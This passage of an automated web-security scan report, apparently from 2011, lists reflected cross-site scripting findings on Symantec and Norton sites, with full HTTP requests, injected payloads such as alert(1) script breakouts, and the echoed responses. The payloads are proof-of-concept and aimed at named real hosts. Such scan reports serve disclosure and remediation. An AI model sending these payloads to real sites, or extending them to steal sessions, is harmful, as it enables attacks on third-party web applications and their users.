<html>
   <head>
       <!-- so that relative references will use absolute url from jsp
                   and not from calling
...[SNIP]...
<br/>
QUERY:11807--><script>alert(1)</script>5053ee4c92a=1
<br/>
...[SNIP]...

3.25. https://renewals.symantec.com/renewals/application [entry_point parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://renewals.symantec.com
Path:   /renewals/application

Issue detail

The value of the entry_point request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96f20"%3balert(1)//6e6ee0889dd was submitted in the entry_point parameter. This input was echoed as 96f20";alert(1)//6e6ee0889dd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /renewals/application?source_code=WEB&entry_point=sym_lrc96f20"%3balert(1)//6e6ee0889dd&inid=us_pagenotfound_smb_store HTTP/1.1
Host: renewals.symantec.com
Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621879623-New%7C1336357879623%3B%20event69%3Devent69%7C1336357879625%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/5

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:32:03 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc96f20"%3balert(1)//6e6ee0889dd&inid=us_pagenotfound_smb_store
Content-Length: 21464

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />


<!-- BEGIN
...[SNIP]...
= "null";
var cookieDays = 20;
var idVisitor = "null";
if (idVisitor != "null") {
   s_2.visitorID = idVisitor;
   s_2.visitorID = s_2.visitorID.replace("-", "_hyphen_");
}
s_2.campaign="WEB_sym_lrc96f20";alert(1)//6e6ee0889dd";
if (s_2.campaign == "null")
   s_2.campaign = "WEB";
s_2.currency="USD";
var friendlyEvents = "";
if (emailSent == "Y") {
   if (s_2.campaign != "null") {
       var r_email = s_2.getValOnce(s_2.campa
...[SNIP]...

3.26. http://updatecenter.norton.com/ [NUCLANG parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://updatecenter.norton.com
Path:   /

Issue detail

The value of the NUCLANG request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5366c"style%3d"x%3aexpression(alert(1))"0c17ca574c1 was submitted in the NUCLANG parameter. This input was echoed as 5366c"style="x:expression(alert(1))"0c17ca574c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?NUCLANG=en5366c"style%3d"x%3aexpression(alert(1))"0c17ca574c1 HTTP/1.1
Host: updatecenter.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 09 Sep 2011 21:46:07 GMT
Connection: close
Content-Length: 25501


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir = "ltr">
<head id="ctl00_Head1"><t
...[SNIP]...
<input type="hidden" id="LangSelected" value="en5366c"style="x:expression(alert(1))"0c17ca574c1" />
...[SNIP]...

3.27. http://www.symantec.com/business/verisign/fraud-detection-service [tid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /business/verisign/fraud-detection-service

Issue detail

The value of the tid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ed59"><script>alert(1)</script>0e8182bf4be was submitted in the tid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /business/verisign/fraud-detection-service?tid=gnps6ed59"><script>alert(1)</script>0e8182bf4be HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621646660-New%7C1336357646660%3B%20event69%3Devent69%7C1336357646662%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/4

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 54792
Cache-Control: public, max-age=3563
Date: Fri, 09 Sep 2011 21:31:23 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Risk-Based Authentication, Fraud Detection, Identity Theft Protection - Veri
...[SNIP]...
<meta name="om.page_name" content="en/us: biz: products: overview: information risk &amp; compliance: verisign identity protection fraud detection service: gnps6ed59"><script>alert(1)</script>0e8182bf4be"/>
...[SNIP]...

3.28. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2722'-alert(1)-'9a6003db3b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sitesc2722'-alert(1)-'9a6003db3b/default/themes/connect2/images/favicon.ico HTTP/1.1
Host: www.symantec.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20init_search%3Dxss%2520site%253Awww.symantec.com%252Fconnect%252Fblogs%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fsearchg.symantec.com%2525252Fsearch%2525253Fas_sitesearch%2525253Dwww.symantec.com%2525252Fconnect%2525252Fblogs%25252526q%2525253Dxss%25252526charset%2525253Dutf-8%25252526proxystylesheet%2525253Dsymc_en_US%25252526client%2525253Dsymc_en_US%25252526hitsceil%2525253D100%25252526site%2525253Dsymc_en_US%25252526output%2525253Dxml_no_dtd%25252526context%2525253Dent%25252526x%2525253D0%25252526y%2525253D0%25252526ie%2525253DUTF-8%25252526ip%2525253D50.23.123.106%25252526access%2525253Dp%25252526sort%2525253Ddat%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%252526ot%25253DA%2526veritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622057794-New%7C1336358057794%3B%20event69%3Devent69%7C1336358057796%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Fri, 09 Sep 2011 21:34:22 +0000
Vary: Cookie
ETag: "1315604062"
Content-Type: text/html; charset=utf-8
Content-Length: 29479
X-Varnish: 1369354182
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Fri, 09 Sep 2011 21:34:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sitesc2722'-alert(1)-'9a6003db3b/default/themes/connect2/images/favicon.ico';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

3.29. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ee12'-alert(1)-'de74577dedc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites/default4ee12'-alert(1)-'de74577dedc/themes/connect2/images/favicon.ico HTTP/1.1
Host: www.symantec.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20init_search%3Dxss%2520site%253Awww.symantec.com%252Fconnect%252Fblogs%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fsearchg.symantec.com%2525252Fsearch%2525253Fas_sitesearch%2525253Dwww.symantec.com%2525252Fconnect%2525252Fblogs%25252526q%2525253Dxss%25252526charset%2525253Dutf-8%25252526proxystylesheet%2525253Dsymc_en_US%25252526client%2525253Dsymc_en_US%25252526hitsceil%2525253D100%25252526site%2525253Dsymc_en_US%25252526output%2525253Dxml_no_dtd%25252526context%2525253Dent%25252526x%2525253D0%25252526y%2525253D0%25252526ie%2525253DUTF-8%25252526ip%2525253D50.23.123.106%25252526access%2525253Dp%25252526sort%2525253Ddat%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%252526ot%25253DA%2526veritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622057794-New%7C1336358057794%3B%20event69%3Devent69%7C1336358057796%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Fri, 09 Sep 2011 21:34:27 +0000
Vary: Cookie
ETag: "1315604067"
Content-Type: text/html; charset=utf-8
Content-Length: 29480
X-Varnish: 1921330105
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Fri, 09 Sep 2011 21:34:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default4ee12'-alert(1)-'de74577dedc/themes/connect2/images/favicon.ico';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

3.30. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ecbc'-alert(1)-'1d8cd1c6f5f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites/default/themes6ecbc'-alert(1)-'1d8cd1c6f5f/connect2/images/favicon.ico HTTP/1.1
Host: www.symantec.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20init_search%3Dxss%2520site%253Awww.symantec.com%252Fconnect%252Fblogs%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fsearchg.symantec.com%2525252Fsearch%2525253Fas_sitesearch%2525253Dwww.symantec.com%2525252Fconnect%2525252Fblogs%25252526q%2525253Dxss%25252526charset%2525253Dutf-8%25252526proxystylesheet%2525253Dsymc_en_US%25252526client%2525253Dsymc_en_US%25252526hitsceil%2525253D100%25252526site%2525253Dsymc_en_US%25252526output%2525253Dxml_no_dtd%25252526context%2525253Dent%25252526x%2525253D0%25252526y%2525253D0%25252526ie%2525253DUTF-8%25252526ip%2525253D50.23.123.106%25252526access%2525253Dp%25252526sort%2525253Ddat%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%252526ot%25253DA%2526veritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622057794-New%7C1336358057794%3B%20event69%3Devent69%7C1336358057796%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Fri, 09 Sep 2011 21:34:33 +0000
Vary: Cookie
ETag: "1315604073"
Content-Type: text/html; charset=utf-8
Content-Length: 29480
X-Varnish: 1921330192
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Fri, 09 Sep 2011 21:34:34 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themes6ecbc'-alert(1)-'1d8cd1c6f5f/connect2/images/favicon.ico';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

3.31. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bdc09'-alert(1)-'d98c9c18875 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites/default/themes/connect2bdc09'-alert(1)-'d98c9c18875/images/favicon.ico HTTP/1.1
Host: www.symantec.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20init_search%3Dxss%2520site%253Awww.symantec.com%252Fconnect%252Fblogs%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fsearchg.symantec.com%2525252Fsearch%2525253Fas_sitesearch%2525253Dwww.symantec.com%2525252Fconnect%2525252Fblogs%25252526q%2525253Dxss%25252526charset%2525253Dutf-8%25252526proxystylesheet%2525253Dsymc_en_US%25252526client%2525253Dsymc_en_US%25252526hitsceil%2525253D100%25252526site%2525253Dsymc_en_US%25252526output%2525253Dxml_no_dtd%25252526context%2525253Dent%25252526x%2525253D0%25252526y%2525253D0%25252526ie%2525253DUTF-8%25252526ip%2525253D50.23.123.106%25252526access%2525253Dp%25252526sort%2525253Ddat%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%252526ot%25253DA%2526veritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622057794-New%7C1336358057794%3B%20event69%3Devent69%7C1336358057796%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Fri, 09 Sep 2011 21:34:39 +0000
Vary: Cookie
ETag: "1315604079"
Content-Type: text/html; charset=utf-8
Content-Length: 29480
X-Varnish: 1921330249
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Fri, 09 Sep 2011 21:34:39 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themes/connect2bdc09'-alert(1)-'d98c9c18875/images/favicon.ico';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

3.32. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55f45'-alert(1)-'cc1ecd4f4c2 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites/default/themes/connect2/images55f45'-alert(1)-'cc1ecd4f4c2/favicon.ico HTTP/1.1
Host: www.symantec.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20init_search%3Dxss%2520site%253Awww.symantec.com%252Fconnect%252Fblogs%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fsearchg.symantec.com%2525252Fsearch%2525253Fas_sitesearch%2525253Dwww.symantec.com%2525252Fconnect%2525252Fblogs%25252526q%2525253Dxss%25252526charset%2525253Dutf-8%25252526proxystylesheet%2525253Dsymc_en_US%25252526client%2525253Dsymc_en_US%25252526hitsceil%2525253D100%25252526site%2525253Dsymc_en_US%25252526output%2525253Dxml_no_dtd%25252526context%2525253Dent%25252526x%2525253D0%25252526y%2525253D0%25252526ie%2525253DUTF-8%25252526ip%2525253D50.23.123.106%25252526access%2525253Dp%25252526sort%2525253Ddat%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%252526ot%25253DA%2526veritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622057794-New%7C1336358057794%3B%20event69%3Devent69%7C1336358057796%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Fri, 09 Sep 2011 21:34:45 +0000
Vary: Cookie
ETag: "1315604085"
Content-Type: text/html; charset=utf-8
Content-Length: 29481
X-Varnish: 1369354450
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Fri, 09 Sep 2011 21:34:45 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themes/connect2/images55f45'-alert(1)-'cc1ecd4f4c2/favicon.ico';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

3.33. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be710'-alert(1)-'6137fcbfa0a was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites/default/themes/connect2/images/favicon.icobe710'-alert(1)-'6137fcbfa0a HTTP/1.1
Host: www.symantec.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20init_search%3Dxss%2520site%253Awww.symantec.com%252Fconnect%252Fblogs%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fsearchg.symantec.com%2525252Fsearch%2525253Fas_sitesearch%2525253Dwww.symantec.com%2525252Fconnect%2525252Fblogs%25252526q%2525253Dxss%25252526charset%2525253Dutf-8%25252526proxystylesheet%2525253Dsymc_en_US%25252526client%2525253Dsymc_en_US%25252526hitsceil%2525253D100%25252526site%2525253Dsymc_en_US%25252526output%2525253Dxml_no_dtd%25252526context%2525253Dent%25252526x%2525253D0%25252526y%2525253D0%25252526ie%2525253DUTF-8%25252526ip%2525253D50.23.123.106%25252526access%2525253Dp%25252526sort%2525253Ddat%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%252526ot%25253DA%2526veritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622057794-New%7C1336358057794%3B%20event69%3Devent69%7C1336358057796%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Fri, 09 Sep 2011 21:34:52 +0000
Vary: Cookie
ETag: "1315604092"
Content-Type: text/html; charset=utf-8
Content-Length: 29481
X-Varnish: 1369354548
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=1794
Date: Fri, 09 Sep 2011 21:34:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themes/connect2/images/favicon.icobe710'-alert(1)-'6137fcbfa0a';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

3.34. http://www.symantec.com/s/searchg/suggest [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
